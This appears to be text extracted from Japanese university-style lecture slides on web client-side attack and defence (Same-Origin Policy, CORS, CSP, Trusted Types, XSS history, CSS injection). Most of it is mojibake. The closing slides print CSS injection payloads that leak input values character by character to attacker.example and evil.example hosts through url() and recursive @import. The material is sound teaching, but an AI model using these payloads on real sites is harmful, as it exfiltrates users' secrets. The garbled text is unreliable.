8FCΫϥΠΞϯταΠυͷ߈๷ ηΩϡϦςΟɾΩϟϯϓࣗशࣨ 5BLBTIJ:POFVDIJ 'MBUU4FDVSJUZ*OD!MNU@TXBMMPX !ZOVDIZ IUUQTTIJGUKTJOGP

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ‣ 5BLBTIJ:POFVDIJ ‣ !MNU@TXBMMPX!ZOVDIZ ‣ "⒏MJBUJPO ‣ 'MBUU4FDVSJUZ*OD ‣ %FQBSUNFOUPG*OGPSNBUJPO4DJFODF 'BDVMUZPG4DJFODF UIF6OJWFSTJUZPG 5PLZP ‣ DUGC MFBEFS TFDDBNQ TUB⒎ ‣ 4FFIUUQTTIJGUKTJOGP XIPBNJ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ֓ཁ 8FCΫϥΠΞϯταΠυͷ߈๷ ‣ ຊࢿྉ͸ηΩϡϦςΟɾΩϟϯϓશࠃେձͰఏڙͨ͠ߨٛ ʮମܥతʹֶͿϞμϯ8FCηΩϡϦςΟʯΛϕʔεʹͯ͠վ୊ɾ վมͨ͠΋ͷͰ͢ɻ ‣ ౰࣌ͷߨٛͷʮମܥతʹֶͿʯཁૉ͸ओʹࣄલֶश͋ͬͨͨΊɺͦΕ ͕আ͔Ε͍ͯΔຊࢿྉ͸ʮମܥతʯͱ͸ݺ΂·ͤΜʜɻ ‣ 8FCΫϥΠΞϯταΠυͷجૅతͳηΩϡϦςΟػߏɺ߈ܸٕज़ ͷൃలͷྺ࢙Λେ·͔ʹோΊ͍͖ͯ·͢ɻ ‣ ຊߨٛͷԋशͰ͸ɺҎԼͷϗετͷΈΛར༻͠·͢ɻ͜ΕҎ֎ͷϗ ετʹ͸Ұ੾߈ܸΛՃ͑ͳ͍Ͱ͍ͩ͘͞ɻ ‣ IBDRNF

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ஫ҙࣄ߲ 8FCΫϥΠΞϯταΠυͷ߈๷ ‣ ຊࢿྉ͸8FCΫϥΠΞϯταΠυʹ͓͚Δ੬ऑੑɾ߈ܸख๏ʹ͍ͭ ͯͷద੾ͳཧղΛଅͨ͢Ίͷ΋ͷͰ͋Γɺҧ๏ߦҝΛॿ௕͢Δ΋ͷ Ͱ͸͋Γ·ͤΜɻ ‣ ຊࢿྉதͰ͸੨എܠͷεϥΠυͰԋश؀ڥ΁ͷϦϯΫΛష͍ͬͯ· ͢ɻͦ͜Ͱࣔ͞Ε͍ͯΔϗετҎ֎ʹ͸Ұ੾߈ܸΛՃ͑ͳ͍Ͱͩ͘ ͍͞ɻ

଎श401$034

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 8FCʹ͓͚Δڥքͷඞཁੑ ͳͥڥք͕Ҿ͔ΕΔ΂͖ͳͷͩΖ͏͔ ‣ υΩϡϝϯτؒͷίϛϡχέʔγϣϯʹҰ੾ͷ੍ݶ͕ͳ͚Ε͹ɺ߈ ܸऀ͸গͳ͍εςοϓͰ৘ใΛϦʔΫͰ͖Δɻ ‣ ໰FWJMDPN͕GFUDI FYBNQMFDPN Λൃߦ͠ɺͦͷ݁ՌΛಡΉ͜ ͱ͕ग़དྷΔ৔߹ɺ߈ܸऀ͸ͲΜͳ͜ͱ͕Ͱ͖ΔͩΖ͏͔ɻ ‣ ໰͋Δ͍͸ɺFYBNQMFDPN͕MPDBM4UPSBHFʹอଘͨ͠΋ͷΛಡΊ ͨΒͲ͏͔ɻ http://evil.com ΋ࣗ͠༝ʹ ಡΈॻ͖͕ग़དྷͨΒʁ http://example.com

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 0SJHJO 3'$5IF8FC0SJHJO$PODFQU ‣ ͋Δ63*ʹରͯ͠ɺ0SJHJO͸࣍ͷUVQMFͱͯ͠ఆٛ͞ΕΔɻ VSJTDIFNF VSJIPTU VSJQPSU ‣ VSJTDIFNFFHIUUQ IUUQT ‣ VSJIPTUFHFYBNQMFDPN ‣ VSJQPSUFH ‣ ஫VSJQPSU͕লུ͞Ε͍ͯΔ৔߹ɺVSJTDIFNFʹରԠͨ͠σϑΥϧτͷ ϙʔτ͕VSJQPSUͱͯ͠࠾༻͞ΕΔɻ IUUQFYBNQMFDPNTPNFQBUI

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 4BNF0SJHJO1PMJDZ "OFYBNQMFPGGFBUVSFTCBTFEPO0SJHJO ‣ ֓ཁ4BNF0SJHJO1PMJDZ ‣ 401͸ҎԼΛېࢭ͢Δɻ ‣ $SPTT0SJHJOͳಡΈࠐΈ ‣ ྫGFUDIͷ݁Ռ ‣ $SPTT0SJHJOͳॻ͖ࠐΈ ͨͩ͠෦෼త ‣ ྫTJNQMFͰͳ͍ϦΫΤετൃߦͷ੍ݶ DG$034 ‣ Ϧιʔε΁ͷॻ͖ࠐΈ 1045 165 %&-&5& ΛΠϝʔδ͢ΔͱΑ͍ɻ ‣ ஫ҙຒΊࠐΈͷ੍ޚ͸ผͷػೳ͕୲౰͢Δɻ ‣ 8FCϒϥ΢β͕࣋ͭ࠷΋ϕʔγοΫͳηΩϡϦςΟػߏͰ͋Δɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ $034 $SPTT0SJHJO3FTPVSDF4IBSJOH 0SJHJOʹجͮ͘ηΩϡϦςΟػߏͷྫ ‣ ໰୊$SPTT0SJHJOͳϦιʔεΛਖ਼౰ͳ༻్Ͱར༻͍͍ͨͤͨ͠͞ ৔߹ʹ͸Ͳ͏͢Ε͹Α͍ͷͩΖ͏͔ɻ ‣ ղܾ$SPTT0SJHJO3FTPVSDF4IBSJOH ‣ ϦιʔεΛར༻͍ͨ͠ଆ͸ɺࣗ਎ͷ0SJHJOΛ0SJHJOϦΫΤετϔο μͷ஋ͱͯ͠ηοτ͠ɺϦΫΤετΛૹ৴͢Δɻ ‣ ϦιʔεΛఏڙ͢Δଆ͸ɺ"DDFTT$POUSPM"MMPXϨεϙϯεϔο μΛ௨ͯ͠ɺڐՄෆڐՄΛ఻͑Δɻ ‣ ϒϥ΢β͸ϨεϙϯεϔομΛݟͯɺదٓڐՄෆڐՄΛ൑அ͢Δɻ ‣ ৄࡉ$SPTT0SJHJO3FTPVSDF4IBSJOH $034 )551c.%/ IUUQTEFWFMPQFSNP[JMMBPSHFO64EPDT8FC)551$034

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 4JUF 0SJHJOΑΓMPPTFͳηΩϡϦςΟڥք ‣ ໰୊0SJHJO͸΍΍ݫ͍͠ͷͰɺΑΓMPPTFͳ੍໿͕΄͍͠ɻ ‣ ղܾ4JUF ‣ 4DIFNFGVM4JUF4DIFNF F5-% ‣ 4DIFNFMFTT4JUFF5-% ‣ ࠾༻ྫ ‣ 4JUF*TPMBUJPO4DIFNFGVM4JUF ‣ $3FJT ".PTIDIVL BOE/0TLPW l4JUF*TPMBUJPO1SPDFTT4FQBSBUJPOGPS8FC4JUFTXJUIJOUIF#SPXTFS zJO 64&/*94FDVSJUZ4ZNQPTJVN ‣ 4BNF4JUF$PPLJF $001 $0&1 4DIFNFMFTT4JUF

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ‣ 4BNF0SJHJO1PMJDZʹΑΓɺ͋Δ0SJHJOͷ΋ͭσʔλ͸ɺͦͷ֎ ෦ͷ0SJHJO͔Β৮Εͳ͍ ˞ྫ֎͸͋Δ ɻ ‣ 944͸ͦͷ੍໿ͷճආͩͱଊ͑ΒΕΔɻ ‣ ߈ܸऀ͸401ͷ੍໿Λड͚ͣʹ ର৅0SJHJOͷ಺ଆΛಈ͖ճΕΔ Origin A εΫϦϓτૠೖ = $_GET['q'] ?>

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 4DIXFOLFUBM 4BNF0SJHJO1PMJDZͷςετ ‣ ٙ໰ 4DIXFOLFUBM ‣ 401%0. 401GPS%0. ͸ɺϞμϯͳϒϥ΢βʹ͓͍ͯɺͲͷΑ ͏ʹ࣮૷͞Ε͍ͯΔͷͩΖ͏͔ɻ ‣ 401%0.ʹؔ܎ͷ͋Δ)5.-ϚʔΫΞοϓ͸ͲΕ͔ɻ ‣ ༧ظ͞ΕΔ"$-ͱ࣮ࡍͷϒϥ΢βͷڍಈ͸Ϛον͍ͯ͠Δ͔ɻ ‣ ൴Βͷߩݙ ͷҰ෦ ‣ 401%0.ͷUFTUCFEΛߏஙͨ͠ IUUQZPVSTPQDPN ɻ ‣ +4DIXFOL ./JFNJFU[ BOE$.BJOLB l4BNF0SJHJO1PMJDZ&WBMVBUJPOJO.PEFSO#SPXTFST zJOUI\64&/*9^ 4FDVSJUZ4ZNQPTJVN \64&/*9^4FDVSJUZ QQr

944ରࡦͷٕज़ͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ରࡦϑϨʔϜϫʔΫଆ 'PPMQSPPG "VUPFTDBQJOH FUD ‣ Ϟμϯͳ8FCϑϨʔϜϫʔΫϥΠϒϥϦͷଟ͕͘ɺ࣍ͷΑ͏ͳର ࡦΛఏڙ͍ͯ͠Δɻ ‣ جຊ͸ࣗಈͰΤεέʔϓ͢Δɻ ‣ ։ൃऀ͕ΤεέʔϓΛҙਤతʹແޮԽͰ͖Δ͕ɺةݥ͸שى͢Δɻ ‣ FHEBOHFSPVTMZ4FU*OOFS)5.- = $_GET['q'] ?> 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ରࡦ$41 $POUFOU4FDVSJUZ1PMJDZ ‣ ΞΠσΞ ‣ ։ൃऀ͸ɺ)5.-+4ͷͲͷ෦෼͕ࣗ෼͕ఏڙͨ͠΋ͷͰɺͲͷ෦෼ ͕ͦ͏Ͱͳ͍͔Λ஌͍ͬͯΔɻ ‣ *OKFDU͞Εͯ΋ɺͦΕ͕F⒎FDUJWFͰ͑͞ͳ͚Ε͹Α͍ɻ ‣ $41͸։ൃऀ͕ϒϥ΢βʹ ؔ܎͢Δ0SJHJO΍ਖ਼نͷ+4͸ͲΕ ͔ɺͳͲͷ ࣄલ৘ใΛ༩͑Δ͜ͱͰɺ$POUFOU*OKFDUJPO߈ܸΛ๷ ͍Ͱ͍͜͏ɺͱ͍͏࢓૊Έɻ Content-Security-Policy: script-src 'nonce-4g34...34r' alert('Hello, CSP!') 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ Ͱ͖Δ͜ͱ $POUFOU4FDVSJUZ1PMJDZ ‣ 'FUDI%JSFDUJWFTϦιʔεͷऔಘɾར༻Λ੍ݶ ‣ ྫTDSJQUTSD GSBNFTSD ‣ %PDVNFOU%JSFDUJWFTυΩϡϝϯτͷ࣋ͭঢ়ଶͷૢ࡞Λ੍ݶ ‣ ྫCBTFVSJ TBOECPY ‣ /BWJHBUJPO%JSFDUJWFTφϏήʔγϣϯͷ੍ݶ ‣ ྫGPSNBDUJPO GSBNFBODFTUPST OBWJHBUFUP ‣ 3FQPSUJOH%JSFDUJWFT$41ҧ൓ͷϨϙʔτػೳΛ੍ݶ ‣ ྫSFQPSUVSJ SFQPSUUP ‣ ࣄલֶशͷ1%'ʹ΋ܰ͘ॻ͍ͨͷͰɺࡉ͔͍࿩͸͠·ͤΜɻ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ؔ࿈ݚڀ $POUFOU4FDVSJUZ1PMJDZ ‣ ࠓ೔ͷ$41ʹࢸΔ·Ͱʹ͸ɺଟ͘ͷݚڀɾݕ౼͕ͳ͞Ε͖ͯͨɻ ‣ ୅දతͳؔ࿈ݚڀ ‣ #&&1 +JNFUBM 5+JN /4XBNZ BOE.)JDLT l%FGFBUJOH4DSJQU*OKFDUJPO"UUBDLTXJUI#SPXTFS&OGPSDFE&NCFEEFE1PMJDJFT zJO 1SPDFFEJOHTPGUIFUI*OUFSOBUJPOBM$POGFSFODFPO8PSME8JEF8FC QQr ‣ 40." 0EBFUBM 5+JN /4XBNZ BOE.)JDLT l%FGFBUJOH4DSJQU*OKFDUJPO"UUBDLTXJUI#SPXTFS&OGPSDFE&NCFEEFE1PMJDJFT zJO 1SPDFFEJOHTPGUIFUI*OUFSOBUJPOBM$POGFSFODFPO8PSME8JEF8FC QQr ‣ /PODFTQBDFT 7BO(VOEZBOE$IFO .7BO(VOEZBOE)$IFO l/PODFTQBDFT6TJOH3BOEPNJ[BUJPOUP&OGPSDF*OGPSNBUJPO'MPX5SBDLJOHBOE5IXBSU $SPTT4JUF4DSJQUJOH"UUBDLT zJO1SPDFFEJOHTPGUIF/FUXPSLBOE%JTUSJCVUFE4ZTUFN4FDVSJUZ4ZNQPTJVN \/%44^ 4BO%JFHP $BMJGPSOJB 64" UI'FCSVBSZUI'FCSVBSZ ‣ ॳظͷ$41 4UBNNFUBM -FWFM -FWFM 44UBNN #4UFSOF BOE(.BSLIBN l3FJOJOHJOUIF8FCXJUI$POUFOU4FDVSJUZ1PMJDZ zJO1SPDFFEJOHTPGUIFUI *OUFSOBUJPOBM$POGFSFODFPO8PSME8JEF8FC QQr 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ࣮ࡍͷӡ༻ྫΛݟΔ $POUFOU4FDVSJUZ1PMJDZ ‣ $41Λಋೖ͍ͯ͠Δ8FCΞϓϦέʔγϣϯ͸૿͖͍͑ͯͯΔɻ ‣ ՝୊5XJUUFS (JU)VC౳ͷ$41ϔομΛݟͯΈΑ͏ɻ ‣ ϝϞ3FQPSUJOHΛ׆༻͍ͯ͠Δاۀ΋͋Δ͔΋ʁ ‣ IUUQTUXJUUFSDPN)VTTFJ/%TUBUVT 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ໰୊ͱల๬ $POUFOU4FDVSJUZ1PMJDZ ‣ ໰୊$41͕ංେԽɾෳࡶԽ͠ɺʮॏ͍ʯଘࡏʹͳ͖ͬͯͨɻ ‣ ۙ೥͸$41ͷऔΓѻ͏ྖҬ͕େ͖͘ͳͬͯ͠·ͬͨɻ ‣ ޙํޓ׵ੑ CBDLXBSEDPNQBUJCJMJUZ Λอͭඞཁ͔Βɺଟ͘ͷ໰୊ ͕ൃੜ͖ͯͨ͠ɻ ‣ ఏҊ$41ΛEJTKPJOUʹ෼ׂ͍ͨ͠ɻ ‣ .JLF8FTUࢯʹΑΔఏҊ ͱ͍͏͔͸ɺΞΠσΞ ‣ IUUQTHJUIVCDPNNJLFXFTUDTQOFYU ‣ ՝୊$41͕ࠓ๊͍͑ͯΔ໰୊ͱ͸ҰମԿͳͷ͔ɺͦΕΛड͚ͯࠓ ޙͲ͏ͳ͍ͬͯ͘ͱࢥΘΕΔ͔ɺߟ͑ͯΈΑ͏ɻ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ରࡦ944"VEJUPSܥ &YBNQMFTPG$MJFOUTJEF.JUJHBUJPOPG944 ‣ ൓ࣹܕ 944Λϒϥ΢β͕ݕ஌ ͯ͠ɺ๷͙ͨΊͷ࢓૊Έɻ ‣ 99441SPUFDUJPOϔομʹΑ ΓϞʔυ͕ܾΊΒΕΔ ‣ ແޮ ‣ pMUFS NPEFpMUFS ‣ CMPDL NPEFCMPDL ‣ ݱࡏ944"VEJUPS͸ফ͑Δํ޲ ʹਐΜͰ͍ΔɻDMBQ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ରࡦ944"VEJUPSܥ &YBNQMFTPG$MJFOUTJEF.JUJHBUJPOPG944 ‣ ൓ࣹܕ 944Λϒϥ΢β͕ݕ஌ ͯ͠ɺ๷͙ͨΊͷ࢓૊Έɻ ‣ 99441SPUFDUJPOϔομʹΑ ΓϞʔυ͕ܾΊΒΕΔ ‣ ແޮ ‣ pMUFS NPEFpMUFS ‣ CMPDL NPEFCMPDL ‣ ݱࡏ944"VEJUPS͸ফ͑Δํ޲ ʹਐΜͰ͍ΔɻDMBQ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల $ISPNFͰ࡟আ͞Εͨ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల ରࡦ5SVTUFE5ZQFT ܕγεςϜΛར༻ͯ͠%C944ͱઓ͏ ‣ 5SVTUFE5ZQFTʜ৴པ͞ΕͨܕΛ࣋ͭ஋ͷΈΛ֤4JOLʹ୅ೖͰ ͖ΔΑ͏ʹɺͦΕҎ֎ͷܕΛ࣋ͭ஋ͷ୅ೖΛېࢭ͢Δ࢓૊Έɻ ‣ ։ൃऀͷ͢Δ͜ͱ ‣ 4JOLʹԿ͔Λ୅ೖ͢Δͱ͖ʹ͸ɺඞͣ5SVTUFE5ZQFTΛ࣋ͭ஋Λੜ ੒͠ͳͯ͘͸ͳΒͳ͍ɻ ‣ )551ϔομΛ௨ͯ͠5SVTUFE5ZQFTΛ༗ޮԽ͢Δඞཁ͕͋Δɻ ‣ ϝϦοτ ‣ 5SVTUFE5ZQFTΛ࣋ͭ஋ͷੜ੒ͷٛ຿෇͚ʹΑΓɺΤεέʔϓ౳ͷॲ ཧ࿙Εͷ͋Δ஋͕ར༻Ͱ͖ͳ͘ͳΔɻ ‣ ϛεʹؾ͕෇͖΍͘͢ͳΔϛεͯͨ͠Βಈ͔ͳ͍ʂ

944ؔ࿈ͷ߈ܸٕज़ͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 944ൃల 944ͱ͍͏ݴ༿͕࢖ΘΕ͸͡ΊΔ $SPTTTJUFTDSJQUJOHBUUBDLT944&YQMPJUTBOEEFGFOTF౳ ೥͝Ζ ೥͝Ζ ೥͝Ζ ೥͝Ζ %0.#BTFE944ͱ͍͏ݴ༿͕࢖ΘΕ͸͡ΊΔ IUUQXXXXFCBQQTFDPSHQSPKFDUTBSUJDMFTTIUNM … 4DSJQUMFTT"UUBDLͱ͍͏֓೦͕ग़ݱ͢Δ 4DSJQU(BEHFUTͱ͍͏ݴ༿͕ग़ݱ͢Δ ೥͝Ζ 944FBSDIͱ͍͏ख๏͕੔ཧ͞Ε࢝ΊΔ ೥͝Ζ 94-FBLTपΓͷٞ࿦͕׆ൃʹͳΔ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 944ٕ๏ͷൃల 4DSJQU(BEHFUT301ͱಉ͡ߟ͑ํ ‣ ໰୊$41ͷ͍ͤͰɺ͏·͘೚ҙ+4࣮ߦ·Ͱ͍͚࣋ͬͯͳ͍ɻ ‣ ղܾ4DSJQU(BEHFUT -FLJFTFUBM ‣ ΞΠσΞ$41Ͱ৴པ͞Ε͍ͯΔ0SJHJOԼͷ+4΍ɺ͢Ͱʹϩʔυ͞ Ε͍ͯΔ+4Λܦ༝ FHFWBMϑΝϛϦͷར༻ PSར༻͢Ε͹ɺ೚ҙ +4࣮ߦʹܨ͛ΒΕΔͷͰ͸ͳ͍͔ɻ ‣ 4-FLJFT ,,PUPXJD[ 4(SP– &7/BWB BOE.+PIOT l$PEFSFVTFBUUBDLTGPSUIF8FC#SFBLJOH$SPTT4JUF4DSJQUJOH .JUJHBUJPOTWJB4DSJQU(BEHFUT zJO1SPDFFEJOHTPGUIF"$.4*(4"$$POGFSFODFPO$PNQVUFSBOE$PNNVOJDBUJPOT 4FDVSJUZ QQr

&YFSDJTF 944$IBMMFOHFW IUUQTYTTDIBMMFOHFUSBJOJOHIBDRNF

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 4DSJQUMFTT"UUBDLT +BWB4DSJQUΛར༻͠ͳ͍߈ܸ ‣ ໰+4Λ࢖ΘͣʹͰ͖Δ߈ܸʹ͸ɺͲͷΑ͏ͳ΋ͷ͕͋Δ͔ɻ ‣ 944ରࡦ͸͍ͯͯ͠΋ɺͦΕҎ֎͸ҙࣝͷ֎Ͱ͋Δɺͱ͍͏৔߹͸͠ ͹͠͹͋ΔͨΊɺ͜Ε͸༗ӹͳ໰ɻ ‣ ఏҊ4DSJQUMFTT"UUBDLT )FJEFSJDIFUBM ͕ମܥత ‣ $44*OKFDUJPOʹؔͯ͠͸ɺ"UUSJCVUFSFBEJOH 'POUMJHBUVSF UFDIOJRVF GPOUSBOHFUFDIOJRVF ౳ͷςΫχοΫ͕XFMMLOPXOɻ ‣ /FXSFTFBSDIMJOFSFDVSTJWFJNQPSUUFDIOJRVFT 1FQF7JMB IUUQTWX[ROFUTMJEFTT@DTT@JOKFDUJPO@BUUBDLTQEG ‣ .)FJEFSJDI ./JFNJFU[ '4DIVTUFS 5)PM[ BOE+4DIXFOL l4DSJQUMFTT"UUBDLT4UFBMJOHUIF1JFXJUIPVU5PVDIJOHUIF 4JMM zJO1SPDFFEJOHTPGUIF"$.$POGFSFODFPO$PNQVUFSBOE$PNNVOJDBUJPOT4FDVSJUZ QQr 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ 94-FBLT944FBSDI "UUBDLTBJNJOHUIFQPTU944XPSME ‣ ໰ͦ΋ͦ΋$POUFOU*OKFDUJPO੬ऑੑ͕ͳ͍৔߹ʹ΋ɺ߈ܸऀ͸Կ Β͔ͷ߈ܸΛߦ͏༨஍͕͋ΔͷͩΖ͏͔ɻ ‣ ΞΠσΞ΋͠৘ใͷ׬શͳϦʔΫ͕ݫͯ͘͠΋ʜʜʁ ‣ $SPTT0SJHJO͔ΒͰ΋ಡΊΔ৘ใ͔ΒɺԿ͔ҙຯͷ͋Δ৘ใΛ நग़Ͱ͖ͳ͍͔ɻ ‣ ͦ΋ͦ΋ಡ·ΕΔ͜ͱ͕૝ఆ͞Ε͍ͯͳ͍৘ใΛɺαΠυνϟω ϧͷ؍ଌΛ௨ͯ͠ಘΔ͜ͱ͕ग़དྷͳ͍͔ʁ ‣ ͜ͷΞΠσΞͷ΋ͱɺ$SPTTTJUF-FBLT 94-FBLT ΍$SPTT TJUF4FBSDI 944FBSDI ͱݺ͹ΕΔྨ͕ొ৔ͨ͠ɻ 944ͷग़ݱ ରࡦͷൃల ߈ܸͷൃల

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ༨ஊ ϨΠϠͷؒΛࢄา͢Δ ‣ ʮ%&1ʹର͢Δ301SFUMJCDʯͱʮ$41ʹର͢Δ4DSJQU (BEHFUTʯʁ ‣ ϋʔυ΢ΣΞ %&1͸/9CJUʹΑΔ࣮ߦՄೳྖҬͷϚʔΫ ‣ $41͸σΟϨΫςΟϒʹΑΔར༻ՄೳྖҬͷϚʔΫͱݟΕΔ ‣ ͜ΕΒ͸͔֬ʹಉ͡੾Γޱͷ߈ܸͰ͋Δͱݴ͑Δɻ ‣ ྫ6TFBGUFS'SFF.BJM (SVTTFUBM ‣ %(SVTTFUBM l6TFBGUFS'SFF.BJM(FOFSBMJ[JOHUIFVTFBGUFSGSFFQSPCMFNBOEBQQMZJOHJUUPFNBJM TFSWJDFT z"4*"$$41SPD"$."TJB$POG$PNQVU$PNNVO4FDVS ‣ 6TF"GUFS'SFF 6"' ͷߟ͑ํΛҰൠԽͯ͠ண૝ΛಘͨΒ͍͠ɻ ‣ %BOJFM(SVTTࢯ΍ͦͷपลͷํʑ͕΍͍ͬͯΔݚڀ͸ඇৗʹ໘ന͍ͷ Ͱɺ΢Υον͓ͯ͘͠ͱ͍͍͜ͱ͕͋Δ͔΋ɻ

$44*OKFDUJPO

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ લఏ஌ࣝ "UUSJCVUF3FBEJOH$44*OKFDUJPO ‣ ࣍ͷΑ͏ͳ)5.-λάΛߟ͑Α͏ɻ ‣ ͜Ε͸࣍ͷͭͷ$44ηϨΫλશͯʹϚον͢Δɻ ‣ ͜ΕΛԠ༻͢Δͱ ଐੑ஋ΛMFBLՄೳɻ input[value ^= "a"] { /* ... */ }
 input[value ^= "ab"] { /* ... */ }
 input[value ^= "abc"] { /* ... */ }

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ߈ܸͷߏ଄ "UUSJCVUF3FBEJOH$44*OKFDUJPO input[value ^= "a"] { background: url(http://attacker.example/?a) } /* ... */ ‘ ߈ܸϕΫλ ϦΫΤετ ϦʔΫ ൓ࣹܕ ஝ੵܕ ४උ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ߈ܸͷݪཧ "UUSJCVUF3FBEJOH$44*OKFDUJPO ‣ ࣍ͷ)5.-λάͷWBMVFଐੑΛϦʔΫ͍ͨ͠৔߹Λߟ͑Δɻ ‣ ߈ܸऀ͸ɺ$44*OKFDUJPO͕Ͱ͖Δ৔ॴʹɺҎԼͷΑ͏ͳ$44Λ܁ Γฦ͠ BΛC D ͱม͑ͭͭ ૠೖ͍ͯ͘͠ɻ ‣ ߈ܸऀ͸BUUBDLFSFYBNQMFͰ଴ͪड͚͓ͯ͘͜ͱͰɺWBMVFଐ ੑͷจࣈ໨Λ஌Δ͜ͱ͕Ͱ͖Δɻ input[value ^= "a"] { 
 background: url(http://attacker.example/?a)
 }

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ -JHBUVSF੍ޚʹΑΔϦʔΫ -JHBUVSF$44*OKFDUJPO ‣ ໰୊͜͜·Ͱʹ঺հͨ͠"UUSJCVUF3FBEJOHͰ͸ɺλάͷଐੑ஋ ͔͠ಡΊͳ͍ͷͰɺ߈ܸʹར༻Ͱ͖Δঢ়گ͕ݶΒΕ͍ͯΔɻ ‣ ղܾҎԼͷΑ͏ͳํ๏ʹΑΓɺଐੑ஋Ҏ֎΋ಡΈग़ͤΔɻ ‣ ϑΥϯτͷ-JHBUVSFΛར༻ͯ͠จࣈͷ෯εΫϩʔϧόʔΛ੍ޚ͢Δ ‣ εΫϩʔϧόʔ͕ੜͨ͡ͱ͖ʹ֎෦αʔόͱ௨৴ͤ͞Δ ‣ ิ଍)FJEFSJDIFUBM ͰΞΠσΞ͕ఏҊ͞Ε͍͕ͯͨɺ1P$ ͕ެ։͞Εͨͷ͸#FOULPXTLJ ͝Ζ͕ॳΊ͔ͯɻ .#FOULPXTLJ l8ZLSBEBOJFEBOZDIX㶄XJFUOZNTUZMVrD[ZMJKBLXZLPS[ZTUB㶛$44ZEPBUBLÓXOBXFCBQMJLBDK㶝 z<0OMJOF> "WBJMBCMFIUUQTTFLVSBLQMXZLSBEBOJFEBOZDIXTXJFUOZNTUZMVD[ZMJKBLXZLPS[ZTUBDDTTZEPBUBLPXOBXFCBQMJLBDKF <"DDFTTFE.BS> ϑΥϯτ੍ޚ εΫϩʔϧόʔ੍ޚ ߈ܸϕΫλ = +

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ͜Ε·Ͱͷख๏ͷ໰୊఺ $44*OKFDUJPO ‣ ՝୊"UUSJCVUF3FBEJOH΋-JHBUVSF੍ޚʹΑΔϦʔΫ͸ɺ۪௚ʹ ΍Δͱɺෳ਺ճͷϦΫΤετ JOKFDUJPO ͕ඞཁʹͳΔɻ ‣ 㲎จࣈϦʔΫ͢Δͨͼʹɺ৽͍͠$44Λ஫ೖ͢Δඞཁ͕͋Δɻ ‣ 㱤ϦΫΤετ͝ͱʹมԽ͢ΔΑ͏ͳର৅͸ϦʔΫͰ͖ͳ͍ɻ ‣ ղܾ3FDVSTJWF*NQPSU5FDIOJRVF 7JMB ‣ ࠶ؼతͳ!JNQPSUΛར༻ͯ͠ɺ౓ͷJOKFDUJPOͰϦʔΫΛࡁ·ͤ Δɺͱ͍͏ख๏ɻ ‣ ͜ͷߨٛͰ΋͜ͷख๏ʹ͍ͭͯ͸આ໌͢Δ͕ɺҎԼͷ7JMBͷεϥΠυΛ ಡΉ͜ͱΛקΊΔɻ IUUQTWX[ROFUTMJEFTT@DTT@JOKFDUJPO@BUUBDLTQEG

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ߈ܸͷΞΠσΞ 3FDVSTJWF*NQPSU5FDIOJRVF$44*OKFDUJPO ‣ ॳΊʹ࣍ͷΑ͏ͳ$44Λ஫ೖ͢Δɻ @import url(//evil.example/0.css) @import url(//evil.example/1.css) input[value^=a]{/*...*/} input[value^=b]{/*...*/} ... input[value^=z]{/*...*/} ‣ DTTͷத਎ΛҎԼͷΑ͏ʹ͓ͯ͘͠ɻ

˜TIJGUKTJOGP 8FCΫϥΠΞϯταΠυͷ߈๷ ߈ܸͷΞΠσΞ 3FDVSTJWF*NQPSU5FDIOJRVF$44*OKFDUJPO @import url(//evil.example/2.css) input[value^=aa]{/*...*/} input[value^=ab]{/*...*/} ... input[value^=az]{/*...*/} ‣ DTT΁ͷ(&5ϦΫΤετ͕ඈΜͰ͘Δ͕ɺҰ୴์ஔ͓ͯ͘͠ɻ ‣ DTTԼ෦Ͱจࣈ໨ͷϦʔΫ͕ߦΘΕΔɻ ‣ ͜ͷจࣈ໨ͷϦʔΫͷ݁ՌΛݩʹDTTΛੜ੒͢Δɻ ‣ ์ஔ͍ͯͨ͠(&5ϦΫΤετʹฦ౴͢Δɻ
